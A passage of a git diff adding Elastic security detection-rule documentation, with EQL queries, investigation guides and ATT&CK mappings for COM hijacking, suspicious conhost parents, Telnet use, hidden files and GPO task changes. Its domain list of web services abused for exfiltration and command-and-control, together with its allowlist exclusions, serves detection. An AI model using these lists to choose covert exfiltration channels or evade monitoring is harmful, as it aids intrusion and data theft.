suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + /* not necessary but good for filtering privileged installations */ + user.domain != "NT AUTHORITY" and + ( + ( + registry.path : ("HK*\\InprocServer32\\", "\\REGISTRY\\*\\InprocServer32\\") and + registry.data.strings: ("scrobj.dll", "C:\\*\\scrobj.dll") and + not registry.path : "*\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\*" + ) or + + /* in general COM Registry changes on Users Hive is less noisy and worth alerting */ + (registry.path : ( + "HKEY_USERS\\*\\InprocServer32\\", + "HKEY_USERS\\*\\LocalServer32\\", + "HKEY_USERS\\*\\DelegateExecute*", + "HKEY_USERS\\*\\TreatAs*", + "HKEY_USERS\\*\\ScriptletURL*", + "\\REGISTRY\\USER\\*\\InprocServer32\\", + "\\REGISTRY\\USER\\*\\LocalServer32\\", + "\\REGISTRY\\USER\\*\\DelegateExecute*", + "\\REGISTRY\\USER\\*\\TreatAs*", + "\\REGISTRY\\USER\\*\\ScriptletURL*" + ) and not + ( + process.executable : "?:\\Program Files*\\Veeam\\Backup and Replication\\Console\\veeam.backup.shell.exe" and + registry.path : ( + "HKEY_USERS\\S-1-*_Classes\\CLSID\\*\\LocalServer32\\", + "\\REGISTRY\\USER\\S-1-*_Classes\\CLSID\\*\\LocalServer32\\")) + ) or + + ( + registry.path : ("HKLM\\*\\InProcServer32\\*", "\\REGISTRY\\MACHINE\\*\\InProcServer32\\*") and + registry.data.strings : ("*\\Users\\*", "*\\ProgramData\\*") + ) + ) and + + /* removes false-positives generated by OneDrive and Teams */ + not process.name: ("OneDrive.exe", "OneDriveSetup.exe", "FileSyncConfig.exe", "Teams.exe") and + + /* Teams DLL loaded by regsvr */ + not (process.name: "regsvr32.exe" and registry.data.strings : "*Microsoft.Teams.*.dll") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..94edb43d44 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc @@ -0,0 +1,145 @@ +[[prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process]] +=== Conhost Spawned By Suspicious Parent Process + +Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Conhost Spawned By Suspicious Parent Process + +The Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications. + +Attackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Retrieve the parent process executable and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26 +- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "conhost.exe" and + process.parent.name : ("lsass.exe", "services.exe", "smss.exe", "winlogon.exe", "explorer.exe", "dllhost.exe", "rundll32.exe", + "regsvr32.exe", "userinit.exe", "wininit.exe", "spoolsv.exe", "ctfmon.exe") and + not (process.parent.name : "rundll32.exe" and + process.parent.args : ("?:\\Windows\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc", + "?:\\WINDOWS\\system32\\PcaSvc.dll,PcaPatchSdbTask", + "?:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc new file mode 100644 index 0000000000..4511964720 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc @@ -0,0 +1,207 @@ +[[prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services]] +=== Connection to Commonly Abused Web Services + +Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Connection to Commonly Abused Web Services + +Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. + +This rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Verify whether the digital signature exists in the executable. +- Identify the operation type (upload, download, tunneling, etc.). +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +network where host.os.type == "windows" and network.protocol == "dns" and + process.name != null and user.id not in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + /* Add new WebSvc domains here */ + dns.question.name : + ( + "raw.githubusercontent.*", + "*.pastebin.*", + "*drive.google.*", + "*docs.live.*", + "*api.dropboxapi.*", + "*dropboxusercontent.*", + "*onedrive.*", + "*4shared.*", + "*.file.io", + "*filebin.net", + "*slack-files.com", + "*ghostbin.*", + "*ngrok.*", + "*portmap.*", + "*serveo.net", + "*localtunnel.me", + "*pagekite.me", + "*localxpose.io", + "*notabug.org", + "rawcdn.githack.*", + "paste.nrecom.net", + "zerobin.net", + "controlc.com", + "requestbin.net", + "cdn.discordapp.com", + "discordapp.com", + "discord.com", + "script.google.com", + "script.googleusercontent.com" + ) and + /* Insert noisy false positives here */ + not ( + process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\WWAHost.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\System32\\MicrosoftEdgeCP.exe", + "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", + "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe" + ) or + + /* Discord App */ + (process.name : "Discord.exe" and (process.code_signature.subject_name : "Discord Inc." and + process.code_signature.trusted == true) and dns.question.name : ("discord.com", "cdn.discordapp.com", "discordapp.com") + ) or + + /* MS Sharepoint */ + (process.name : "Microsoft.SharePoint.exe" and (process.code_signature.subject_name : "Microsoft Corporation" and + process.code_signature.trusted == true) and dns.question.name : "onedrive.live.com" + ) or + + /* Firefox */ + (process.name : "firefox.exe" and (process.code_signature.subject_name : "Mozilla Corporation" and + process.code_signature.trusted == true) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Web Service +** ID: T1102 +** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Code Repository +** ID: T1567.001 +** Reference URL: https://attack.mitre.org/techniques/T1567/001/ +* Sub-technique: +** Name: Exfiltration to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc new file mode 100644 index 0000000000..e176a52039 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-connection-to-external-network-via-telnet]] +=== Connection to External Network via Telnet + +Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and + not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", + "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", + "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc new file mode 100644 index 0000000000..69e97a16f9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet]] +=== Connection to Internal Network via Telnet + +Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and + cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", + "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", + "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc new file mode 100644 index 0000000000..0565cc2188 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc @@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline]] +=== Creation of Hidden Files and Directories via CommandLine + +Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and +process.args regex~ """\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}""" and +not process.name in ("ls", "find", "grep", "git") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc new file mode 100644 index 0000000000..29a0360615 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file]] +=== Creation of Hidden Shared Object File + +Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.extension == "so" and file.name : ".*.so" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc new file mode 100644 index 0000000000..9735ca3c01 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc @@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service]] +=== Creation or Modification of a new GPO Scheduled Task or Service + +Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.path : ("?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml", + "?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\Services\\Services.xml") and + not process.name : "dfsrs.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..227ec41290 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc @@ -0,0 +1,97 @@ +[[prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process]] +=== Cron Job Created or Changed by Previously Unknown Process + +Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* 